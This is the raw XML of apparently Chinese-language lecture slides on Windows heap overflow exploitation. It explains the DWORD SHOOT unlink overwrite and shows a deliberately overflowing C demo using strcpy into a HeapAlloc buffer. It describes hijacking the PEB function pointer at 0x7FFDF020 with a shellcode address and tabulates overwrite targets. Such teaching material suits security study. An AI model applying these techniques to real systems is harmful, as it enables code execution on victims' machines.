            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="608013" y="4508500"/>
            <a:ext cx="7888287" cy="1928813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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82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a:t>其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>bink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>后向指针是目标，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>flink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>前向指针是子弹，比如覆盖后向地址为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>，前向指针为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>8888</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>。在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>unlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>的时候，就要把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>8888</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>写入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>地址处。假设我们</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>8888</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>的地址是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>的地址，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>处存储着一个库函数地址，并且之后会调用。那么在调用这个函数时，就会转而调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>。这个过程叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>DWORD SHOOT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="在这里插入图片描述"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="503237" y="1988840"/>
            <a:ext cx="8204200" cy="3379787"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> main(){</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	HANDLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>hHeap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	char *heap;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>[]=”AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA”;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>hHeap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>= = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>HeapCreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(Heap_GENERATE_EXCEPTIONS,0X1000,0xffff);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>getchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	heap = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>HeapAlloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(hHeap,0,0x10);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(“heap addr:0x%08x\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>n”,heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>heap,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>HeapFree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(hHeap,0,heap);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>HeapDestroy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>hHeap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	Return 0;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="在这里插入图片描述"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1722043" y="980728"/>
            <a:ext cx="5658640" cy="3181794"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="4149080"/>
            <a:ext cx="7776864" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进行字符拷贝的时候出现问题，超过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>字节的数据将覆盖尾块的块首。当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分配时，将导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DWORD SHOOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7FFDF020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>处的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RtlEnterCriticalSection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数指针改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DWORD SHOOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>完毕后，堆溢出导致异常，最终调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ExitProcess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数结束进程其中前向指针是子弹（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的起始地址），后向指针是目标（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的函数指针地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7FFDF020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>固定的）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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DWORD SHOOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>常见攻击方式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78851" name="内容占位符 5"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="内容占位符 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="436563" y="1989138"/>
          <a:ext cx="8229600" cy="1482724"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2479253">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="294854612"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2232248">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2209162180"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3518099">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="481604776"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370681">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>攻击目标</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45700" marB="45700"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>内容</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45700" marB="45700"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>改写后的结果</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45700" marB="45700"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="797840380"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370681">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>栈帧中的函数返回地址</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45700" marB="45700"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
                        <a:t>shellcode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>的起始地址</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45700" marB="45700"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>函数返回时，跳去执行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
                        <a:t>shellcode</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45700" marB="45700"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2262265547"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370681">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>栈帧中</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
                        <a:t>S.E.H</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>句柄</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45700" marB="45700"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
                        <a:t>shellcode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>的起始地址</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45700" marB="45700"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>异常发生时，跳去执行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
                        <a:t>shellcode</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45700" marB="45700"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="292378313"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370681">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>重要函数调用地址</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45700" marB="45700"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
                        <a:t>shellcode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>的起始地址</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45700" marB="45700"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>函数调用时，跳去执行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
                        <a:t>shellcode</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45700" marB="45700"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1025790548"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>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Heap Spray</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="798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原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
